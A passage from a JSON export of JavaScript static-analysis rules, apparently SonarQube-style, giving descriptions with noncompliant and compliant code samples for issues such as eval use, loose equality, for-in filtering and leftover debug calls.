file.<\/p>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:BoundOrAssignedEvalOrArguments","repo":"javascript","name":"\"eval\" and \"arguments\" should not be bound or assigned","htmlDesc":"<p><code>eval<\/code> is used to evaluate a string as JavaScript code, and <code>arguments<\/code> is used to access function arguments through indexed\nproperties. As a consequence, <code>eval<\/code> and <code>arguments<\/code> should not be bound or assigned, because doing so would overwrite the\noriginal definitions of those two reserved words. <\/p>\n<p>What's more, using either of those two names to assign or bind will generate an error in JavaScript strict mode code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\neval = 17; \/\/ Noncompliant\narguments++; \/\/ Noncompliant\n++eval; \/\/ Noncompliant\nvar obj = { set p(arguments) { } }; \/\/ Noncompliant\nvar eval; \/\/ Noncompliant\ntry { } catch (arguments) { } \/\/ Noncompliant\nfunction x(eval) { } \/\/ Noncompliant\nfunction arguments() { } \/\/ Noncompliant\nvar y = function eval() { }; \/\/ Noncompliant\nvar f = new Function(\"arguments\", \"return 17;\"); \/\/ Noncompliant\n\nfunction fun() {\n if (arguments.length == 0) { \/\/ Compliant\n \/\/ do something\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nresult = 17;\nargs++;\n++result;\nvar obj = { set p(arg) { } };\nvar result;\ntry { } catch (args) { }\nfunction x(arg) { }\nfunction args() { }\nvar y = function fun() { };\nvar f = new Function(\"args\", \"return 17;\");\n\nfunction fun() {\n if (arguments.length == 0) {\n \/\/ do something\n }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:CollapsibleIfStatements","repo":"javascript","name":"Collapsible \"if\" statements should be merged","htmlDesc":"<p>Merging collapsible <code>if<\/code> statements increases the code's readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x != undefined) {\n if (x === 2) {\n \/\/ ...\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (x != undefined && x === 2) {\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:ContinueStatement","repo":"javascript","name":"\"continue\" should not be used","htmlDesc":"<p><code>continue<\/code> is an unstructured control flow statement. It makes code less testable, less readable and less maintainable. Structured\ncontrol flow statements such as <code>if<\/code> should be used instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n for (i = 0; i < 10; i++) {\n if (i == 5) {\n continue; \/* Noncompliant *\/\n }\n alert(\"i = \" + i);\n }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n for (i = 0; i < 10; i++) {\n if (i != 5) { \/* Compliant *\/\n alert(\"i = \" + i);\n }\n }\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.5 - The continue statement shall not be used. <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:ElseIfWithoutElse","repo":"javascript","name":"\"if ... else if\" constructs should end with \"else\" clauses","htmlDesc":"<p>This rule applies whenever an <code>if<\/code> statement is followed by one or more <code>else if<\/code> statements; the final <code>else if<\/code>\nshould be followed by an <code>else<\/code> statement.<\/p>\n<p>The requirement for a final <code>else<\/code> statement is defensive programming.<\/p>\n<p>The <code>else<\/code> statement should either take appropriate action or contain a suitable comment as to why no action is taken. This is\nconsistent with the requirement to have a final <code>default<\/code> clause in a <code>switch<\/code> statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x == 0) {\n doSomething();\n} else if (x == 1) {\n doSomethingElse();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (x == 0) {\n doSomething();\n} else if (x == 1) {\n doSomethingElse();\n} else {\n throw \"Unexpected value for x\";\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.10 - All if...else if constructs shall be terminated with an else clause. <\/li>\n <li> MISRA C++:2008, 6-4-2 - All if...else if constructs shall be terminated with an else clause. <\/li>\n <li> MISRA C:2012, 15.7 - All if...else if constructs shall be terminated with an else statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/PQHRAw\">CERT, MSC57-J.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:EqEqEq","repo":"javascript","name":"\"===\" and \"!==\" should be used instead of \"==\" and \"!=\"","htmlDesc":"<p>The <code>==<\/code> and <code>!=<\/code> operators do type coercion before comparing values. This is bad because it can mask type errors. For\nexample, it evaluates <code>' \\t\\r\\n' == 0<\/code> as <code>true<\/code>.<\/p>\n<p>It is best to always use the side-effect-less <code>===<\/code> and <code>!==<\/code> operators instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (var == 'howdy') {...} \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (var === 'howdy') {...}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Even if testing the equality of a variable against null doesn't do exactly what most JavaScript developers believe, usage of <code>==<\/code> or\n<code>!=<\/code> is tolerated in such context. In the following case, if <code>foo<\/code> hasn't been initialized, its default value is not\n<code>null<\/code> but <code>undefined<\/code>. Nevertheless <code>undefined == null<\/code>, so JavaScript developers get the expected behavior.<\/p>\n<pre>\nif(foo == null) {...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:Eval","repo":"javascript","name":"Code should not be dynamically injected and executed","htmlDesc":"<p>The <code>eval<\/code> function is a way to run arbitrary code at run-time. Dynamically evaluating code is slow and a potential security issue when\nthe arguments haven't been properly validated.<\/p>\n<p>In general it is better to avoid it altogether, particularly when there are safer alternatives.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar value = eval('obj.' + propName); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar value = obj[propName];\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule will not raise an issue when the argument of the <code>eval<\/code> call is a literal string as it is reasonably safe.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/95.html\">MITRE CWE-95<\/a> - CWE-95: Improper Neutralization of Directives in Dynamically\n Evaluated Code ('Eval Injection') <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:ExcessiveParameterList","repo":"javascript","name":"Functions should not have too many parameters","htmlDesc":"<p>A long parameter list can indicate that a new structure should be created to wrap the numerous parameters or that the function is doing too many\nthings.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a maximum number of 4 parameters:<\/p>\n<pre>\nfunction doSomething(param1, param2, param3, param4, param5) {\n...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething(param1, param2, param3, param4) {\n...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"maximumFunctionParameters","htmlDesc":"The maximum authorized number of parameters","defaultValue":"7","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:ForIn","repo":"javascript","name":"\"for...in\" loops should filter properties before acting on them","htmlDesc":"<p>The <code>for...in<\/code> statement allows you to loop through the names of all of the properties of an object. The list of properties includes all\nthose properties that were inherited through the prototype chain. This has the side effect of serving up functions when the interest is in data\nproperties. Programs that don't take this into account can fail.<\/p>\n<p>Therefore, the body of every <code>for...in<\/code> statement should be wrapped in an <code>if<\/code> statement that filters which properties are\nacted upon. It can select for a particular type or range of values, or it can exclude functions, or it can exclude properties from the prototype. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (name in object) {\n doSomething(name); \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (name in object) {\n if (object.hasOwnProperty(name)) {\n doSomething(name);\n }\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Loops used to clone objects are ignored.<\/p>\n<pre>\nfor (prop in obj) {\n a[prop] = obj[prop]; \/\/ Compliant by exception\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:FunctionComplexity","repo":"javascript","name":"Functions should not be too complex","htmlDesc":"<p>The Cyclomatic Complexity of functions should not exceed a defined threshold. Complex code may perform poorly and can be difficult to test\nthoroughly.<\/p>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"maximumFunctionComplexityThreshold","htmlDesc":"The maximum authorized complexity in function","defaultValue":"10","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:FunctionDeclarationsWithinBlocks","repo":"javascript","name":"Function declarations should not be made within blocks","htmlDesc":"<p>While most script engines support function declarations within blocks, it is not part of ECMAScript 5 and below, and from browser to browser the\nimplementations are inconsistent with each other. ECMAScript 5 and below only allow function declarations in the root statement list of a script or\nfunction. If you are targeting browsers that don't support ECMAScript 6, use a variable initialized with a function expression to define a function\nwithin a block :<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x) {\n function foo() {}\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (x) {\n var foo = function() {}\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:FutureReservedWords","repo":"javascript","name":"\"future reserved words\" should not be used as identifiers","htmlDesc":"<p>The following words may be used as keywords in future evolutions of the language, so using them as identifiers should be avoided to allow an easier\nadoption of those potential future versions:<\/p>\n<ul>\n <li> <code>await<\/code> <\/li>\n <li> <code>class<\/code> <\/li>\n <li> <code>const<\/code> <\/li>\n <li> <code>enum<\/code> <\/li>\n <li> <code>export<\/code> <\/li>\n <li> <code>extends<\/code> <\/li>\n <li> <code>implements<\/code> <\/li>\n <li> <code>import<\/code> <\/li>\n <li> <code>interface<\/code> <\/li>\n <li> <code>let<\/code> <\/li>\n <li> <code>package<\/code> <\/li>\n <li> <code>private<\/code> <\/li>\n <li> <code>protected<\/code> <\/li>\n <li> <code>public<\/code> <\/li>\n <li> <code>static<\/code> <\/li>\n <li> <code>super<\/code> <\/li>\n <li> <code>yield<\/code> <\/li>\n<\/ul>\n<p>Use of these words as identifiers would produce an error in JavaScript <code>strict<\/code> mode code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar package = document.getElementsByName(\"foo\"); \/\/ Noncompliant\nvar someData = { package: true }; \/\/ Compliant, as it is not used as an identifier here\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar elements = document.getElementsByName(\"foo\"); \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:LabelPlacement","repo":"javascript","name":"Only \"while\", \"do\" and \"for\" statements should be labelled","htmlDesc":"<p>Any statement or block of statements can be identified by a label, but those labels should be used only on <code>while<\/code>,\n<code>do-while<\/code> and <code>for<\/code> statements. Using labels in any other context leads to unstructured, confusing code. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nmyLabel:if (i % 2 == 0) { \/\/ Noncompliant\n if (i == 12) {\n print(\"12\");\n break myLabel;\n }\n print(\"Odd number, but not 12\");\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nmyLabel:for (i = 0; i < 10; i++) { \/\/ Compliant\n print(\"Loop\");\n break myLabel;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:NestedIfDepth","repo":"javascript","name":"Control flow statements \"if\", \"for\", \"while\", \"switch\" and \"try\" should not be nested too deeply","htmlDesc":"<p>Nested <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>switch<\/code>, and <code>try<\/code> statements is a key ingredient for making\nwhat's known as \"Spaghetti code\".<\/p>\n<p>Such code is hard to read, refactor and therefore maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\n if (condition1) { \/\/ Compliant - depth = 1\n \/* ... *\/\n if (condition2) { \/\/ Compliant - depth = 2\n \/* ... *\/\n for(int i = 0; i < 10; i++) { \/\/ Compliant - depth = 3, not exceeding the limit\n \/* ... *\/\n if (condition4) { \/\/ Non-Compliant - depth = 4\n if (condition5) { \/\/ Depth = 5, exceeding the limit, but issues are only reported on depth = 4\n \/* ... *\/\n }\n return;\n }\n }\n }\n }\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"maximumNestingLevel","htmlDesc":"Maximum allowed "if\/for\/while\/switch\/try" statements nesting depth","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:ParsingError","repo":"javascript","name":"JavaScript parser failure","htmlDesc":"<p>When the JavaScript parser fails, it is possible to record the failure as a violation on the file. This way, not only it is possible to track the\nnumber of files that do not parse but also to easily find out why they do not parse.<\/p>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:PrimitiveWrappers","repo":"javascript","name":"Wrapper objects should not be used for primitive types","htmlDesc":"<p>The use of wrapper objects for primitive types is gratuitous, confusing and dangerous. If you use a wrapper object constructor for type conversion,\njust remove the <code>new<\/code> keyword, and you'll get a primitive value automatically. If you use a wrapper object as a way to add properties to a\nprimitive, you should re-think the design. Such uses are considered bad practice, and should be refactored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nlet x = new Number(\"0\");\nif (x) {\n alert('hi'); \/\/ Shows 'hi'.\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nlet x = Number(\"0\");\nif (x) {\n alert('hi');\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Cases when argument of primitive type constructor is a literal of the same type are ignored, except <code>new Boolean(false)<\/code>.<\/p>\n<pre>\nlet booleanObject = new Boolean(true);\nlet numberObject = new Number(0);\nlet stringObject = new String('');\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1067","repo":"javascript","name":"Expressions should not be too complex","htmlDesc":"<p>The complexity of an expression is defined by the number of <code>&&<\/code>, <code>||<\/code> and <code>condition ? ifTrue : ifFalse<\/code>\noperators it contains.<\/p>\n<p>A single expression's complexity should not become too high to keep the code readable.<\/p>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"max","htmlDesc":"Maximum number of allowed conditional operators in an expression","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:S1105","repo":"javascript","name":"An open curly brace should be located at the end of a line","htmlDesc":"<p>Sharing some coding conventions is a key point to make it possible for a team to efficiently collaborate. This rule makes it mandatory to place\nopen curly braces at the end of lines of code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition)\n{ \/\/Noncompliant\n doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition) { \/\/Compliant\n doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Object literals appearing as arguments can start on their own line.<\/p>\n<pre>\nfunctionWithObject(\n { \/\/Compliant\n g: \"someValue\"\n }\n);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1125","repo":"javascript","name":"Boolean literals should not be redundant","htmlDesc":"<p>Redundant Boolean literals should be removed from expressions to improve readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (booleanVariable == true) { \/* ... *\/ }\nif (booleanVariable != true) { \/* ... *\/ }\nif (booleanVariable || false) { \/* ... *\/ }\ndoSomething(!false);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (booleanVariable) { \/* ... *\/ }\nif (!booleanVariable) { \/* ... *\/ }\nif (booleanVariable) { \/* ... *\/ }\ndoSomething(true);\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The use of literal booleans in comparisons which use identity operators (<code>===<\/code> and <code>!==<\/code>) are ignored.<\/p>\n\n<h2>Deprecated<\/h2>\n<p>This rule is deprecated, and will eventually be removed.<\/p>","status":"DEPRECATED","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1134","repo":"javascript","name":"Track uses of \"FIXME\" tags","htmlDesc":"<p><code>FIXME<\/code> tags are commonly used to mark places where a bug is suspected, but which the developer wants to deal with later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide(numerator, denominator) {\n return numerator \/ denominator; \/\/ FIXME denominator value might be 0\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1135","repo":"javascript","name":"Track uses of \"TODO\" tags","htmlDesc":"<p><code>TODO<\/code> tags are commonly used to mark places where some more code is required, but which the developer wants to implement later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n \/\/ TODO\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1219","repo":"javascript","name":"\"switch\" statements should not contain non-case labels","htmlDesc":"<p>Even if it is legal, mixing case and non-case labels in the body of a switch statement is very confusing and can even be the result of a typing\nerror.<\/p>\n<h2>Noncompliant Code Examples<\/h2>\n<p>Case 1, the code is syntactically correct but the behavior is not the expected one<\/p>\n<pre>\nswitch (day) {\n case MONDAY:\n case TUESDAY:\n WEDNESDAY: \/\/ instead of \"case WEDNESDAY\"\n doSomething();\n break;\n ...\n}\n<\/pre>\n<p>Case 2, the code is correct and behaves as expected but is hardly readable <\/p>\n<pre>\nswitch (day) {\n case MONDAY:\n break;\n case TUESDAY:\n foo:for(i = 0 ; i < X ; i++) {\n \/* ... *\/\n break foo; \/\/ this break statement doesn't relate to the nesting case TUESDAY\n \/* ... *\/\n }\n break;\n \/* ... *\/\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<p>Case 1<\/p>\n<pre>\nswitch (day) {\n case MONDAY:\n case TUESDAY:\n case WEDNESDAY:\n doSomething();\n break;\n ...\n}\n<\/pre>\n<p>Case 2<\/p>\n<pre>\nswitch (day) {\n case MONDAY:\n break;\n case TUESDAY:\n compute(args); \/\/ put the content of the labelled \"for\" statement in a dedicated method\n break;\n\n \/* ... *\/\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. <\/li>\n <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1264","repo":"javascript","name":"A \"while\" loop should be used instead of a \"for\" loop","htmlDesc":"<p>When only the condition expression is defined in a <code>for<\/code> loop, and the initialization and increment expressions are missing, a\n<code>while<\/code> loop should be used instead to increase readability. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (;condition;) { \/*...*\/ }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nwhile (condition) { \/*...*\/ }\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1301","repo":"javascript","name":"\"switch\" statements should have at least 3 \"case\" clauses","htmlDesc":"<p><code>switch<\/code> statements are useful when there are many different cases depending on the value of the same expression.<\/p>\n<p>For just one or two cases however, the code will be more readable with <code>if<\/code> statements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (variable) {\n case 0:\n doSomething();\n break;\n default:\n doSomethingElse();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (variable == 0) {\n doSomething();\n} else {\n doSomethingElse();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.5 - Every switch statement shall have at least one case clause. <\/li>\n <li> MISRA C++:2008, 6-4-8 - Every switch statement shall have at least one case-clause. <\/li>\n <li> MISRA C:2012, 16.6 - Every switch statement shall have at least two switch-clauses <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S138","repo":"javascript","name":"Functions should not have too many lines","htmlDesc":"<p>A function that grows too large tends to aggregate too many responsibilities.<\/p>\n<p>Such functions inevitably become harder to understand and therefore harder to maintain. <\/p>\n<p>Above a specific threshold, it is strongly advised to refactor into smaller functions which focus on well-defined tasks.<\/p>\n<p>Those smaller functions will not only be easier to understand, but also probably easier to test.<\/p>\n<h2>Exceptions<\/h2>\n<p>This function ignores Immediately Invoked Function Expressions (IIFE), which are functions that are created and invoked without ever being assigned\na name.<\/p>\n<pre>\n(function () { \/\/ Ignored by this rule\n\n function open() { \/\/ Classic function declaration; not ignored\n \/\/ ...\n }\n\n function read() {\n \/\/ ...\n }\n\n function readlines() {\n \/\/ ...\n }\n})();\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"max","htmlDesc":"Maximum authorized lines in a function","defaultValue":"200","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:S1442","repo":"javascript","name":"\"alert(...)\" should not be used","htmlDesc":"<p><code>alert(...)<\/code> can be useful for debugging during development, but in production mode this kind of pop-up could expose sensitive\ninformation to attackers, and should never be displayed. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(unexpectedCondition)\n{\n alert(\"Unexpected Condition\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489.html\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S1656","repo":"javascript","name":"Variables should not be self-assigned","htmlDesc":"<p>There is no reason to re-assign a variable to itself. Either this statement is redundant and should be removed, or the re-assignment is a mistake\nand some other value or variable was intended for the assignment instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction setName(name) {\n name = name;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction setName(name) {\n this.name = name;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S1871","repo":"javascript","name":"Two branches in a conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having two <code>cases<\/code> in a <code>switch<\/code> statement or two branches in an <code>if<\/code> chain with the same implementation is at\nbest duplicate code, and at worst a coding error. If the same logic is truly needed for both instances, then in an <code>if<\/code> chain they should\nbe combined, or for a <code>switch<\/code>, one should fall through to the other. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (i) {\n case 1:\n doFirstThing();\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n case 3: \/\/ Noncompliant; duplicates case 1's implementation\n doFirstThing();\n doSomething();\n break;\n default:\n doTheRest();\n}\n\nif (a >= 0 && a < 10) {\n doFirstThing();\n doTheThing();\n}\nelse if (a >= 10 && a < 20) {\n doTheOtherThing();\n}\nelse if (a >= 20 && a < 50) {\n doFirstThing();\n doTheThing(); \/\/ Noncompliant; duplicates first condition\n}\nelse {\n doTheRest();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch (i) {\n case 1:\n case 3:\n doFirstThing();\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n default:\n doTheRest();\n}\n\nif ((a >= 0 && a < 10) || (a >= 20 && a < 50)) {\n doFirstThing();\n doTheThing();\n}\nelse if (a >= 10 && a < 20) {\n doTheOtherThing();\n}\nelse {\n doTheRest();\n}\n<\/pre>\n<p>or <\/p>\n<pre>\nswitch (i) {\n case 1:\n doFirstThing();\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n case 3:\n doFirstThing();\n doThirdThing();\n break;\n default:\n doTheRest();\n}\n\nif (a >= 0 && a < 10) {\n doFirstThing();\n doTheThing();\n}\nelse if (a >= 10 && a < 20) {\n doTheOtherThing();\n}\nelse if (a >= 20 && a < 50) {\n doFirstThing();\n doTheThirdThing();\n}\nelse {\n doTheRest();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Blocks in an <code>if<\/code> chain that contain a single line of code are ignored, as are blocks in a <code>switch<\/code> statement that contain a\nsingle line of code with or without a following <code>break<\/code>.<\/p>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1994","repo":"javascript","name":"\"for\" loop increment clauses should modify the loops' counters","htmlDesc":"<p>It can be extremely confusing when a <code>for<\/code> loop's counter is incremented outside of its increment clause. In such cases, the increment\nshould be moved to the loop's increment clause if at all possible.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (i = 0; i < 10; j++) { \/\/ Noncompliant\n \/\/ ...\n i++;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (i = 0; i < 10; i++, j++) {\n \/\/ ...\n}\n<\/pre>\n<p>Or<\/p>\n<pre>\nfor (i = 0; i < 10; i++) {\n \/\/ ...\n j++;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2123","repo":"javascript","name":"Values should not be uselessly incremented","htmlDesc":"<p>A value that is incremented or decremented and then not stored is at best wasted code and at worst a bug.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar i = 0;\ni = i++; \/\/ Noncompliant; i is still zero\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar i = 0;\ni++;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2138","repo":"javascript","name":"\"undefined\" should not be assigned","htmlDesc":"<p><code>undefined<\/code> is the value you get for variables and properties which have not yet been created. Use the same value to reset an existing\nvariable and you lose the ability to distinguish between a variable that exists but has no value and a variable that does not yet exist. Instead,\n<code>null<\/code> should be used, allowing you to tell the difference between a property that has been reset and one that was never created.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myObject = {};\n\n\/\/ ...\nmyObject.fname = undefined; \/\/ Noncompliant\n\/\/ ...\n\nif (myObject.lname == undefined) {\n \/\/ property not yet created\n}\nif (myObject.fname == undefined) {\n \/\/ no real way of knowing the true state of myObject.fname\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar myObject = {};\n\n\/\/ ...\nmyObject.fname = null;\n\/\/ ...\n\nif (myObject.lname == undefined) {\n \/\/ property not yet created\n}\nif (myObject.fname == undefined) {\n \/\/ no real way of knowing the true state of myObject.fname\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2208","repo":"javascript","name":"Wildcard imports should not be used","htmlDesc":"<p>On the principle that clearer code is better code, you should explicitly <code>import<\/code> the things you want to use in a module. Using\n<code>import *<\/code> imports everything in the module, and runs the risk of confusing maintainers. Similarly, <code>export * from \"module\";<\/code>\nimports and then re-exports everything in the module, and runs the risk of confusing not just maintainers but also users of the module.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nimport * as Imported from \"aModule\"; \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2228","repo":"javascript","name":"Console logging should not be used","htmlDesc":"<p>Debug statements are always useful during development. But include them in production code - particularly in code that runs client-side - and you\nrun the risk of inadvertently exposing sensitive information, slowing down the browser, or even erroring-out the site for some users.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconsole.log(password_entered); \/\/ 